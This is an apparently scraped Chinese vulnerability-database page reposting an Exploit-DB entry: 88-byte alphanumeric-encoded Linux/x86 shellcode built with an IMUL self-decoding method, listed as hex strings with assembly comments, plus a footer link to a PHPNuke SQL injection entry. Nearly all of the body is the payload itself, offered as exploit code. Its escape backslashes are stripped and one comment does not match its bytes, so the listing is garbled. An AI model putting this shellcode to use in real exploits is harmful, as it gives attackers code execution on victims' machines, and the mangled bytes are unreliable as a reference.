Linux/x86 – Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/x86 – Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

漏洞ID 1054840 漏洞类型
发布时间 2004-12-22 更新时间 2004-12-22
图片[1]-Linux/x86 – Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13419
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*-----------------------------------------------------*/
     /*     Alpha-Numeric Shellcode using IMUL Method       */
     /*           By XORt@dallas_2600)              88bytes */
     /*-----------------------------------------------------*/
     "x68x69x58x69x6b" /* push $0x6b695869             */
     "x68x7ax36x37x70" /* push $0x7037367a             */
     "x68x58x58x41x73" /* push $0x73415858             */
     "x68x71x4ax77x79" /* push $0x79774a71             */
     "x68x65x77x57x31" /* push $0x31577765             */
     "x68x42x69x57x77" /* push $0x6850c031             */
     "x50x50x50x50x50" /* 17 push %eax's               */
     "x50x50x50x50x50" /*                              */
     "x50x50x50x50x50" /*                              */
     "x50x50"             /*                              */
     "x54"                 /* push %esp                    */
     "x59"                 /* pop %ecx                     */
     "x6bx51x58x57"     /* imul $0x57, 0x58(%ecx), %edx */
     "x42"                 /* inc %edx                     */
     "x52"                 /* push %edx                    */
     "x6bx41x54x78"     /* imul $0x78, 0x54(%ecx), %edx */
     "x34x63"             /* xor $0x63, %al               */
     "x50"                 /* push %eax                    */
     "x6bx51x50x4a"     /* imul $0x4a, 0x50(%ecx), %edx */
     "x4a"                 /* dec %edx                     */
     "x4a"                 /* dec %edx                     */
     "x52"                 /* push %edx                    */
     "x6bx51x4cx79"     /* imul $0x79, 0x4c(%ecx), %edx */
     "x4a"                 /* dec %edx                     */
     "x52"                 /* push %edx                    */
     "x6bx41x48x36"     /* imul $0x36, 0x48(%ecx), %edx */
     "x34x61"             /* xor $0x61, %al               */
     "x50"                 /* push %eax                    */
     "x6bx51x44x79"     /* imul $0x79, 0x44(%ecx), %edx */
     "x4a"                 /* dec %edx                     */
     "x52"                 /* push %edx                    */
     /*------------------------------------------[bytes:88]-*/


// milw0rm.com [2004-12-22]

相关推荐: PHPNuke Admin Cookie Variable SQL Injection Vulnerabiliy

PHPNuke Admin Cookie Variable SQL Injection Vulnerabiliy 漏洞ID 1100846 漏洞类型 Input Validation Error 发布时间 2003-02-19 更新时间 2003-02-19 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享